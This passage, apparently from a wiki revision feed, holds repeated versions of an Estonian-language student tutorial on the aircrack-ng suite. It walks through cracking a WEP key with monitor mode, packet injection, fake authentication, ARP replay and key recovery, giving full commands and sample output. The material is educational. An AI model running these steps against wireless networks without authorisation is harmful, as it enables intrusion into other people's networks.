&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89308</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89308"/>
		<updated>2015-05-25T19:33:40Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Eeldused */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89306</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89306"/>
		<updated>2015-05-25T19:31:50Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* WEP võtme murdmine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
